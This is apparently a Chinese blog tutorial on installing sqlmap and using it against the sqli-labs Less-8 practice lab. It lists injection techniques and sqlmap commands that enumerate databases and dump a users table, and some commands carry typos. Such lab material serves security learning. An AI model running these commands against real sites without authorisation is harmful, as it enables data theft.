自动化SQL注入神器:
SQLMAP,功能时发现并利用指定的URL的SQL注入漏洞。支持的数据库:MySQL、Oracle、MSSQLserver、Access、DB2等
百度网盘
链接:https://pan.baidu.com/s/1xfQiWsFu17SEGcb4tB6jjw
提取码: 5yqd
SQLMAP的安装:
一、安装python环境
python-3.8.2-amd64
安装中选中:Add python3.8 to path,只有不用手动配置python的环境变量!选择自定义安装
点击next,这里可以修改储存路径,我是虚拟机,就扔C盘了
Win+r输入cmd进入命令框,输入python,安装成功
二、安装SQLMAP
重命名为sqlmap
三、生成SQLMAP快捷方式
桌面右键创建快捷方式
输入cmd
名称写为花花(最好写成SQLMAP,以免忘记,你也可以叫别的名字比如草草什么的)
在生成的SQLMAP下右键属性,修改起始位置为你储存sqlmap的起始位置,点击应用,确定
进来就是这样的
四、SQLMAP注入模式:
1.布尔盲注
2.时间盲注
3.报错注入
4.union联合注入
5.堆叠注入
SQLMAP的应用:(拿sqlilabs less8举例)
常用选项:
-u:指定url
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --dbms:指定数据库类型
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --dbms=mysql
--os:指定操作系统
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --os=linux
--proxy:指定代理
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --proxy 代理的url
--data:指定POST方式提交的数据
sqlmap.py -u http://127.0.0.1:500/Less-8 --data=’id’=1
--flush-session :刷新缓存
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --flush-session
--cookie=COOKIE:指定访问页面的cookies信息
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --cookie="PHPSESSID=a8d127e.."
五、SQLMAP的注入流程:
--dbs:列出所有的数据库名称
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1--dbs (列出所有数据库)
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --current-db (列出当前数据库)
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --current-db --dbms=mysql
-D :指定数据库
-T:指定数据表
-C:指定列名称
--tables:列出指定数据库中的所有表
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 -D security --tables
--columns:列出指定库中的[指定表的]所有列
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 -D security -columns
--dump:列出指定库中的表中的数据
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 -D security -T users -dump